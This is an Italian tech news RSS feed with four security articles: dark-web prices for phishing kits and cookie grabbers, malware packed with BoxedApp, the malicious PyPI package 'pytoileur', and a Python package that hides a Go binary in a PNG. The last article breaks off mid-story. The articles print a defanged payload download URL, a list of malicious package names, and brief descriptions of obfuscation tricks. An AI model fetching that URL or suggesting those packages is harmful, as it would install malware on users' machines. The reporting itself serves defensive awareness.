<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Malware Archivi - Webbare</title>
	<atom:link href="https://www.webbare.it/tag/malware/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.webbare.it/tag/malware/</link>
	<description>Easy choise, easy way!</description>
	<lastBuildDate>Wed, 20 Nov 2024 09:28:51 +0000</lastBuildDate>
	<language>it-IT</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1</generator>

<image>
	<url>https://www.webbare.it/wp-content/uploads/2020/02/jira-logo-scaled.png</url>
	<title>Malware Archivi - Webbare</title>
	<link>https://www.webbare.it/tag/malware/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Scopri quanto costano sul dark web gli strumenti utilizzati dagli hacker [Screenshot inclusi]</title>
		<link>https://www.webbare.it/2024-11-dark-web-hacker/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=dark-web-hacker</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 20 Nov 2024 09:25:13 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[dark web]]></category>
		<category><![CDATA[Hacker]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[phishing]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2547</guid>

					<description><![CDATA[<p>I kit di phishing sono spesso gratuiti, mentre i layout di falsi siti web possono costare circa 50 dollari.</p>
<p>L'articolo <a href="https://www.webbare.it/2024-11-dark-web-hacker/">Scopri quanto costano sul dark web gli strumenti utilizzati dagli hacker [Screenshot inclusi]</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0bab76" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0bab54408"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0c2c9c887" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0c2ca0 "><div class="wpb_wrapper thegem-custom-6a9b57c0c2c9c887">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0c30e26950"  >
			<div class="wpb_wrapper">
				<p><strong>Smascherare le offerte del dark web: gli strumenti e le truffe usate dagli hacker in questa stagione di shopping</strong></p>
<p><strong>Gli hacker possono facilmente reperire kit per la truffa e il phishing, oltre a layout di siti di shopping falsi, a partire da soli 5 dollari o addirittura gratis.</strong></p>
<p>Tradizionalmente, novembre e dicembre sono i mesi di punta per le vendite al dettaglio, grazie soprattutto alle festività natalizie. Le <u>statistiche sugli acquisti online</u> rivelano che <strong>il Black Friday e il Cyber Monday sono i giorni con il più alto volume di spesa dell&#8217;anno</strong>.</p>
<p>Mentre i consumatori si preparano a fare acquisti online, gli hacker si preparano a truffarli. Questo è possibile perché il dark web è pieno di kit di phishing, truffe, tutorial, siti web falsi e persino corsi personalizzati su come realizzare queste frodi. Grazie alle analisi di <u>NordStellar</u>, ora possiamo monitorare e confrontare queste minacce.</p>
<p>“I kit di phishing sono spesso gratuiti, mentre i layout di siti web falsi possono costare circa 50 dollari. Gli abbonamenti ai malware-as-a-service si aggirano intorno ai 150 dollari al mese, e gli strumenti più costosi, come i cookie grabber &#8211; le pagine per la cattura dei cookie &#8211; superano facilmente i 400 dollari. Tuttavia, come per qualsiasi altra cosa, è possibile trovare sconti anche su questi articoli,&#8221; spiega Adrianus Warmenhoven, esperto di sicurezza informatica di <u>NordVPN</u>.</p>
<p><strong>Creare falsi siti di shopping: Una tattica semplice e diffusa </strong></p>
<p>Le <u>statistiche sulle truffe online</u> rivelano che i falsi siti di e-commerce sono tra le frodi più efficaci. Fino all&#8217;84% delle persone cadono nella trappola di un sito di shopping falso e quasi la metà di queste perde denaro.</p>
<p>Questi siti imitando aziende o servizi legittimi, riproducendo spesso design e loghi in modo identico, mentre gli URL possono differire di appena un carattere.</p>
<p>“I truffatori si spacciano per le principali piattaforme come PayPal, Amazon, Shopify, vari siti bancari e persino Netflix per colpire i loro utenti. I kit per la creazione di queste pagine offrono diverse funzionalità, come la personalizzazione tramite codifica HTML e la facilità di configurazione. Queste pagine raccolgono informazioni sensibili, come i dettagli delle carte di credito, e sono dotate di sistemi avanzati anti-bot. Inoltre, sono progettate per ostacolare la scansione dei siti web e sono in grado di bypassare i sistemi di sicurezza come l’OTP (one-time password) e il metodo 2FA (autenticazione a 2 fattori), con l’obiettivo di eludere il rilevamento,” afferma Warmenhoven.</p>
<p><strong>Offerte sul dark web: Malware e cookie grabber</strong></p>
<p>Il dark web offre anche <u>servizi di malware-as-a-service in abbonamento, disponibili per soli 100-150 dollari al mese</u>, mentre <strong>i kit di phishing sono spesso gratuiti</strong>. Di conseguenza, i criminali informatici hanno accesso a una vasta gamma di strumenti per creare le loro truffe e ottenere supporto attraverso canali Telegram e forum facilmente accessibili.</p>
<p>Le pagine &#8220;cookie grabber” sono <strong>tra i kit di truffa online più costosi</strong> che è possibile trovare nel dark web. Queste pagine sono appositamente create per catturare i cookie dal browser dell&#8217;utente o dalle piattaforme social, come Facebook, che gli hacker possono poi utilizzare per scopi illeciti.</p>
<p>“<u>Una ricerca condotta da NordVPN ha rivelato che oltre 54 miliardi di cookie sono stati trovati in vendita sul dark web</u>, evidenziando l&#8217;entità del problema. Potresti non rendertene conto, ma se un hacker entra in possesso dei tuoi cookie attivi, non avrà bisogno di credenziali, password e nemmeno di un’autenticazione a più fattori per accedere ai tuoi account e prenderne il controllo. Le informazioni personali più comunemente rubate tramite i cookie includono nomi, indirizzi email, città, password e indirizzi fisici,” è il commento di Warmenhoven.</p>
<p><img class="CToWUd" src="https://ci3.googleusercontent.com/meips/ADKq_NacYzQI_e3bz4vAHTXGjAohgv8jvursrWvoJwySqWnRyfi5cFrmjpFrv0cPQiIRS8GtMFMzXH5Clx5rRM68RWhRzEzx_bq5JpW5AHFmsf9C8MOBsmD-dqZR4vjuZkiI13woR0zCjwmfoZClB95NVmI135gf90Y8COl8pU7ltCbDew=s0-d-e1-ft#https://eu.vocuspr.com/Publish/3564741/vcsPRAsset_3564741_545968_6a7a9fdc-65fd-40d3-87fe-a1a91577a4d2_0.png" alt="Image" width="222" height="380" data-bit="iit" /><img class="CToWUd" src="https://ci3.googleusercontent.com/meips/ADKq_NaV_xcaSX35kHT0mzR71snc8Dx1zOlPS0_5CEeqLncyKqBxUNZS-H__PQ99ZaF5qumpkepaT2LUKHyJ-jfGlmN_j1H2kU-PVfpcgFRphHur-o1YTFQnPSgCuH0TkujD5RPpNu3cqcf3BXNuB-eXaJR1W8912UAUDnKCCM6Ksg-y8A=s0-d-e1-ft#https://eu.vocuspr.com/Publish/3564741/vcsPRAsset_3564741_545969_17c5d35d-ce9a-4592-b402-6c661b6a27a4_0.png" alt="Image" width="217" height="390" data-bit="iit" /><img class="CToWUd" src="https://ci3.googleusercontent.com/meips/ADKq_NYRER-kUnMwjp1ydO-BT96QreTpwtbjE1fB-fXrzGeEQiaFPfaUjFiE6Ahj03FS2iVlx3Bm0IErOjnGLr54OyHVc0Bh4bngukcF0gG7Vl9Dben9-pw-BynNkLCuXsfwAv140kJ6mxh-askj4Sagj5fSgOKTymaySARENo0UW3shog=s0-d-e1-ft#https://eu.vocuspr.com/Publish/3564741/vcsPRAsset_3564741_545970_91b6d4a8-9d79-4190-87e5-83e5649c5fa7_0.png" alt="Image" width="203" height="379" data-bit="iit" /></p>
<p><strong>Come proteggerti dalle truffe degli acquisti online</strong></p>
<p>Sebbene non esista una soluzione infallibile per proteggersi dagli hacker, Warmenhoven suggerisce alcune strategie digitali efficaci:</p>
<ul type="disc">
<li><strong>Imparare a riconoscere il phishing: </strong>le email e gli SMS di phishing sono tra le principali cause di infezioni da malware.</li>
<li><strong>Evitare i download illegali: </strong>non scaricare software, applicazioni o aggiornamenti da fonti non ufficiali, ma solo da app store o siti web ufficiali.</li>
<li><strong>Usare strumenti di protezione come Threat Protection Pro<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> di NordVPN: </strong>questa funzione blocca siti dannosi, verifica la presenza di malware nei download e impedisce il tracciamento dei dati, proteggendo le informazioni personali degli utenti.</li>
<li><strong>Eliminare regolarmente i cookie: </strong>ridurre al minimo i cookie memorizzati aiuta a limitare i dati che gli hacker possono sottrarre.</li>
<li><strong>Proteggere gli account con l&#8217;autenticazione a più fattori (MFA): </strong>abilitare l’autenticazione a più fattori sui propri account aggiunge un ulteriore livello di sicurezza, fondamentale se qualcuno entra in possesso delle tue credenziali.</li>
<li><strong>Utilizzare strumenti di monitoraggio del dark web: </strong>Dark Web Monitor scansiona continuamente il dark web per rilevare eventuali fughe di dati. Se il tuo indirizzo email appare in un database compromesso, ricevi un avviso.</li>
</ul>
<p>&nbsp;</p>
<p style="font-size: 12px;">Fonte: <a href="https://nordvpn.com">NordVPN</a></p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c30e26950{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c30e26950{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c30e26950{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c30e26950{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-11-dark-web-hacker/">Scopri quanto costano sul dark web gli strumenti utilizzati dagli hacker [Screenshot inclusi]</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Gli hacker sfruttano sempre più spesso i packer per diffondere il malware</title>
		<link>https://www.webbare.it/2024-06-hacker-sfruttano-packer/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=hacker-sfruttano-packer</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 12 Jun 2024 13:16:08 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[Mobile Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[boxedapp]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[packers]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2436</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-06-hacker-sfruttano-packer/">Gli hacker sfruttano sempre più spesso i packer per diffondere il malware</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0c560f" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0c5601444"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0c58bb9229" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0c58bd "><div class="wpb_wrapper thegem-custom-6a9b57c0c58bb9229">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0c5b322627"  >
			<div class="wpb_wrapper">
				<p>I ricercatori di Cybersecurity di Check Point hanno scoperto una tendenza crescente degli hacker a sfruttare strumenti commerciali di imballaggio come BoxedApp per nascondere e distribuire vari ceppi di malware. Nell&#8217;ultimo anno è stato osservato un aumento significativo dell&#8217;abuso dei prodotti BoxedApp, in particolare negli attacchi rivolti a istituzioni finanziarie e organizzazioni governative.</p>
<p>BoxedApp offre una serie di packer commerciali, tra cui BoxedApp Packer e BxILMerge, che forniscono funzionalità avanzate come l&#8217;archiviazione virtuale (file system virtuale, registro virtuale), i processi virtuali e un sistema di strumentazione universale (aggancio API WIN/NT). Sebbene questi strumenti siano stati progettati per scopi legittimi, gli attori delle minacce li hanno sfruttati per confezionare payload dannosi, eludere il rilevamento e rendere più difficili le attività di analisi.</p>
<p>Secondo le indagini dei ricercatori, i principali prodotti BoxedApp abusati sono BoxedApp Packer e BxILMerge, entrambi costruiti sopra l&#8217;SDK di BoxedApp. Questi prodotti garantiscono agli attori delle minacce l&#8217;accesso alle funzionalità più avanzate dell&#8217;SDK, consentendo loro di creare packer personalizzati e unici che sfruttano funzionalità all&#8217;avanguardia pur rimanendo abbastanza diversi da evitare il rilevamento statico.</p>
<p>I vantaggi derivanti dall&#8217;utilizzo delle funzionalità avanzate ed esclusive offerte da BoxedApp SDK superano gli svantaggi derivanti dall&#8217;utilizzo di un packer commerciale noto. Tra le caratteristiche e le capacità più importanti vi sono il File System Virtuale, il Registro Virtuale, i Processi Virtuali (PE Injection), l&#8217;SDK per l&#8217;aggancio delle API WIN/NT, il packing generale (distruzione delle importazioni PE originali, compressione, ecc.), la produzione di bundle di singoli file e la garanzia che tutto l&#8217;I/O verso lo storage virtuale rimanga in memoria senza scaricare i file su disco.</p>
<p>Sebbene i prodotti BoxedApp siano disponibili da diversi anni, il loro abuso per scopi dannosi è aumentato in modo significativo nell&#8217;ultimo anno, senza che finora sia stato riconosciuto pubblicamente il loro legame con BoxedApp. Sebbene l&#8217;uso di packer commerciali abbia sia pro che contro per gli aggressori, le capacità avanzate che forniscono sembrano superare i potenziali svantaggi.</p>
<p>I vantaggi dell&#8217;utilizzo dei prodotti BoxedApp per la distribuzione di malware includono:</p>
<ul>
<li>Prodotti affidabili e pronti all&#8217;uso con funzionalità avanzate</li>
<li>SDK BoxedApp disponibile per la creazione di packer personalizzati e diversificati</li>
<li>Sistema di archiviazione virtuale proprietario (Virtual File System, Virtual Registry)</li>
<li>Creazione di processi virtuali per l&#8217;iniezione di PE</li>
<li>SDK semplice per agganciare le API WIN/NT</li>
<li>Impacchettamento generale (distrugge le importazioni di PE originali, esegue la compressione, ecc.)</li>
<li>Produzione di bundle a file singolo con tutte le dipendenze in Virtual Storage</li>
<li>Tutto l&#8217;I/O verso il Virtual Storage rimane in memoria, evitando cadute di file su disco</li>
<li>Difficoltà nel distinguere le applicazioni impacchettate regolari da quelle dannose (alto tasso di falsi positivi).&nbsp;</li>
</ul>
<p>&nbsp;</p>
<p>I contro includono:</p>
<ul>
<li>Facile rilevamento statico dei prodotti BoxedApp originali utilizzati per il confezionamento</li>
<li>Rilevamento statico generico di alcune funzionalità dell&#8217;SDK comunemente utilizzate per scopi dannosi (ad esempio, aggancio di API WIN/NT, iniezione di processi virtuali &#8211; PE).</li>
<li>Alto tasso di rilevamento di falsi positivi per le applicazioni non dannose confezionate da BoxedApp</li>
</ul>
<p>Nonostante l&#8217;elevato tasso di falsi positivi, che potrebbe causare discrepanze e innescare rilevamenti anche per applicazioni non dannose, Windows Defender integrato e altre soluzioni antivirus di alto livello non sono in genere interessati.</p>
<p>I ricercatori hanno analizzato circa 1.200 campioni di BoxedApp inviati a VirusTotal negli ultimi tre anni ed elaborati con successo dalle sandbox VT. È allarmante notare che il 25% di questi campioni è stato rilevato come dannoso in base al loro comportamento. La cronologia di invio a VirusTotal di questi campioni dannosi mostra una tendenza crescente all&#8217;abuso di BoxedApp per la distribuzione di malware.</p>
<p>Tra le famiglie di malware più comunemente distribuite vi sono RAT (Trojan ad accesso remoto) come QuasarRAT, NanoCore, NjRAT, Neshta, AsyncRAT e LodaRAT, nonché stealers come RevengeRAT, AgentTesla, RedLine e Remcos. Inoltre, sono stati rilevati casi di ransomware come LockBit.</p>
<p>I ricercatori hanno condotto un&#8217;analisi approfondita degli interni di BoxedApp, concentrandosi sulle strutture binarie risultanti confezionate da diversi prodotti. Questa analisi ha fornito spunti per disimballare il Virtual Storage e ricostruire i principali binari dannosi. Sono state inoltre fornite le firme Yara per aiutare a rilevare staticamente il packer in uso, distinguendo al contempo il prodotto specifico utilizzato.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c5b322627{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c5b322627{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c5b322627{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c5b322627{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-06-hacker-sfruttano-packer/">Gli hacker sfruttano sempre più spesso i packer per diffondere il malware</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sonatype espone il pacchetto PyPI dannoso &#8220;pytoileur&#8221;</title>
		<link>https://www.webbare.it/2024-05-sonatype-pypi/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=sonatype-pypi</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 29 May 2024 15:35:51 +0000</pubDate>
				<category><![CDATA[Dev]]></category>
		<category><![CDATA[Devops]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[package]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2427</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-05-sonatype-pypi/">Sonatype espone il pacchetto PyPI dannoso &#8220;pytoileur&#8221;</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0c6634" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0c662b4143"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0c68c51566" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0c68c7 "><div class="wpb_wrapper thegem-custom-6a9b57c0c68c51566">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0c6b325109"  >
			<div class="wpb_wrapper">
				<p><strong>Sonatype</strong> ha scoperto “<em>pytoileur</em>”, un pacchetto <strong>PyPI</strong> dannoso progettato per scaricare e installare binari Windows troianizzati in grado di sorvegliare, requisire la persistenza e rubare criptovalute. Questa scoperta fa parte di una campagna più ampia, durata mesi, denominata “Cool package”, volta a infiltrarsi nella comunità dei codificatori.</p>
<p>Ieri, un sistema di rilevamento automatico di malware gestito da Sonatype, noto come Sonatype Repository Firewall, ha segnalato un pacchetto PyPI appena pubblicato chiamato “pytoileur”. Il pacchetto dannoso, rintracciato come sonatype-2024-1783, aveva registrato 264 download dal suo rilascio prima che Sonatype avvertisse gli amministratori di PyPI di rimuoverlo.</p>
<p>Il pacchetto si descriveva come “pacchetto cool”, con una descrizione <strong>HTML</strong> che affermava che si trattava di “uno strumento di gestione delle API scritto in Python”. È interessante notare che includeva un riferimento a “pystob”, un pacchetto ormai defunto, indicando un tentativo di typosquatting per ingannare gli utenti di pacchetti legittimi come “Pyston”.</p>
<p>A prima vista, il file “setup.py” all&#8217;interno di “pytoileur” sembrava pulito, ma Jeff Thornhill, ricercatore di sicurezza di Sonatype, ha scoperto del codice maligno abilmente nascosto con spazi bianchi eccessivi.</p>
<p>“Sebbene la codifica base64 sia piuttosto standard nelle applicazioni e non offra molto in termini di mascheramento del codice dannoso, l&#8217;autore ha tentato di ‘nascondere’ questa particolare stringa codificata alla revisione umana manuale iniettandola dopo un&#8217;istruzione di stampa e includendo un paragrafo di spazi bianchi prima del codice”, ha spiegato Thornhill.</p>
<p>Il payload codificato in base64 è stato progettato per colpire gli utenti di Windows. Utilizzava comandi Python per scaricare un eseguibile dannoso da un server esterno (hxxp://51.77.140[.]144:8086/dl/runtime). Il binario dannoso, “Runtime.exe”, viene eseguito utilizzando comandi Windows PowerShell e VBScript. Questo eseguibile impiega misure anti-rilevamento per evitare i controlli e installa spyware aggiuntivi in grado di persistere, tra cui funzionalità di furto di informazioni e crypto-jacking.</p>
<p>Ax Sharma, ricercatore di Sonatype, ha scoperto che l&#8217;attore delle minacce dietro il pacchetto PyPI dannoso “pytoileur” sta pubblicando risposte false su StackOverflow, invitando le persone a installare il pacchetto dannoso.</p>
<p><iframe id="twitter-widget-0" class="" style="position: static; visibility: visible; width: 550px; height: 672px; display: block; flex-grow: 1;" title="X Post" src="https://platform.twitter.com/embed/Tweet.html?creatorScreenName=Gadget_Ry&amp;dnt=true&amp;embedId=twitter-widget-0&amp;features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOltdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2ZvbGxvd2VyX2NvdW50X3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9iYWNrZW5kIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19yZWZzcmNfc2Vzc2lvbiI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfZm9zbnJfc29mdF9pbnRlcnZlbnRpb25zX2VuYWJsZWQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X21peGVkX21lZGlhXzE1ODk3Ijp7ImJ1Y2tldCI6InRyZWF0bWVudCIsInZlcnNpb24iOm51bGx9LCJ0ZndfZXhwZXJpbWVudHNfY29va2llX2V4cGlyYXRpb24iOnsiYnVja2V0IjoxMjA5NjAwLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3Nob3dfYmlyZHdhdGNoX3Bpdm90c19lbmFibGVkIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19kdXBsaWNhdGVfc2NyaWJlc190b19zZXR0aW5ncyI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdXNlX3Byb2ZpbGVfaW1hZ2Vfc2hhcGVfZW5hYmxlZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdmlkZW9faGxzX2R5bmFtaWNfbWFuaWZlc3RzXzE1MDgyIjp7ImJ1Y2tldCI6InRydWVfYml0cmF0ZSIsInZlcnNpb24iOm51bGx9LCJ0ZndfbGVnYWN5X3RpbWVsaW5lX3N1bnNldCI6eyJidWNrZXQiOnRydWUsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9mcm9udGVuZCI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9fQ%3D%3D&amp;frame=false&amp;hideCard=false&amp;hideThread=false&amp;id=1795813203500322953&amp;lang=en-gb&amp;origin=https%3A%2F%2Fwww.developer-tech.com%2Fnews%2F2024%2Fmay%2F29%2Fsonatype-exposes-malicious-pypi-package-pytoileur%2F&amp;sessionId=7d4cde34bbb9fe0f4e5dafcf600819b8f4576b04&amp;siteScreenName=Developer_Tech&amp;theme=light&amp;widgetsVersion=2615f7e52b7e0%3A1702314776716&amp;width=550px" frameborder="0" scrolling="no" allowfullscreen="allowfullscreen" data-tweet-id="1795813203500322953"></iframe></p>
<p>Questa preoccupazione è amplificata dalla grande presenza di sviluppatori alle prime armi su StackOverflow, che stanno ancora imparando e potrebbero essere vittime di consigli dannosi.</p>
<p>Ulteriori indagini hanno rivelato che “pytoileur” fa parte di una campagna più ampia legata a pacchetti dannosi identificati in precedenza. Questi pacchetti, spesso descritti semplicemente come “Cool package”, hanno utilizzato tecniche di inganno simili dal 2023. Si camuffano da strumenti di gestione delle API o da versioni semplificate di utility ben note, prendendo di mira gli sviluppatori di varie nicchie, tra cui l&#8217;intelligenza artificiale e l&#8217;apprendimento automatico.</p>
<p>Uno dei pacchetti precedenti, “gpt-requests”, che sembrava rivolto agli sviluppatori di IA, nascondeva anche i payload dannosi utilizzando gli spazi bianchi. Simili a “pytoileur”, questi payload scaricano binari troianizzati destinati allo spionaggio e al furto di dati.</p>
<p>Il pacchetto “lalalaopti” è particolarmente degno di nota perché conteneva moduli di codice Python in chiaro per il dirottamento degli appunti, il keylogging, l&#8217;accesso remoto alla webcam e la cattura degli screenshot, evidenziando ulteriormente l&#8217;intento malevolo degli attori delle minacce dietro questa campagna.</p>
<p>I ricercatori di Sonatype e Checkmarx hanno identificato diversi pacchetti dannosi collegati a questa campagna, tra cui:</p>
<ul>
<li>gogogolokl</li>
<li>gpt-richieste</li>
<li>kokokoako</li>
<li>lalalaopti</li>
<li>pybowl</li>
<li>pyclack</li>
<li>pyefflorer</li>
<li>pyhjdddo</li>
<li>pyhulul</li>
<li>piioapso</li>
<li>pyjio</li>
<li>pyjoul</li>
<li>pykokalalz</li>
<li>pykooler</li>
<li>pyktrkatoo</li>
<li>pilone</li>
<li>piminor</li>
<li>piowler</li>
<li>pipiele</li>
<li>pystallerer</li>
<li>pistob</li>
<li>pytarlooko</li>
<li>pytasler</li>
<li>pitoileur</li>
<li>pywolle</li>
<li>pywool</li>
</ul>
<p>La ricomparsa della campagna “Cool package” attraverso “pytoileur” dimostra la persistenza delle minacce poste da attori malintenzionati negli ambienti di sviluppo software. In presenza di minacce simili, Sonatype dichiara che continuerà a espandere le proprie blocklist e a salvaguardare la comunità degli sviluppatori.</p>

			</div>
			<style>@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c6b325109{display: block!important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c6b325109{display: block!important;}}@media screen and (max-width: 1023px) {.thegem-vc-text.thegem-custom-6a9b57c0c6b325109{position: relative !important;}}@media screen and (max-width: 767px) {.thegem-vc-text.thegem-custom-6a9b57c0c6b325109{position: relative !important;}}</style>
		</div>
	
</div></div></div></div>
</div><p>L'articolo <a href="https://www.webbare.it/2024-05-sonatype-pypi/">Sonatype espone il pacchetto PyPI dannoso &#8220;pytoileur&#8221;</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Phylum scopre un malware mirato camuffato in un pacchetto Python</title>
		<link>https://www.webbare.it/2024-05-phylum-malware-python/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=phylum-malware-python</link>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 22 May 2024 11:58:05 +0000</pubDate>
				<category><![CDATA[Mobile App]]></category>
		<category><![CDATA[Mobile Dev]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[development]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[infosec]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Phylum]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[Pypi]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://www.webbare.it/?p=2421</guid>

					<description><![CDATA[<p>L'articolo <a href="https://www.webbare.it/2024-05-phylum-malware-python/">Phylum scopre un malware mirato camuffato in un pacchetto Python</a> proviene da <a href="https://www.webbare.it">Webbare</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wpb-content-wrapper" id="wpb-content-root"><div id="vc_row-6a9b57c0c75ff" class="vc_row wpb_row vc_row-fluid thegem-custom-6a9b57c0c75f68593"><div class="wpb_column vc_column_container vc_col-sm-12 thegem-custom-6a9b57c0c787f75" ><div class="vc_column-inner thegem-custom-inner-6a9b57c0c7881 "><div class="wpb_wrapper thegem-custom-6a9b57c0c787f75">
	
		<div class="wpb_text_column wpb_content_element  thegem-vc-text thegem-custom-6a9b57c0c7ac05738"  >
			<div class="wpb_wrapper">
				<p>Gli esperti di cybersicurezza di <strong>Phylum</strong> hanno individuato un payload dannoso incorporato in un popolare pacchetto Python sul repository <strong>PyPI</strong>. Il pacchetto, denominato requests-darwin-lite, è una variante non autorizzata della libreria requests, ampiamente utilizzata.</p>
<p>Il pacchetto<em> requests-darwin-lite</em> è stato abilmente progettato per emulare la sua controparte legittima, ma includeva un binario Go nascosto in un file immagine sovradimensionato che fingeva di essere un semplice logo. Questo file &#8211; un PNG etichettato come immagine della barra laterale &#8211; pesava insolitamente circa 17 MB, in netto contrasto con le dimensioni normali di circa 300 kB della versione autentica.</p>
<p>Durante l&#8217;installazione del pacchetto, se l&#8217;ambiente di installazione era <strong>macOS</strong>, veniva attivata una classe di comando specializzata &#8220;PyInstall&#8221;. Questa classe esegue un comando codificato in base64 che estrae l&#8217;UUID (Universal Unique Identifier) del sistema.</p>
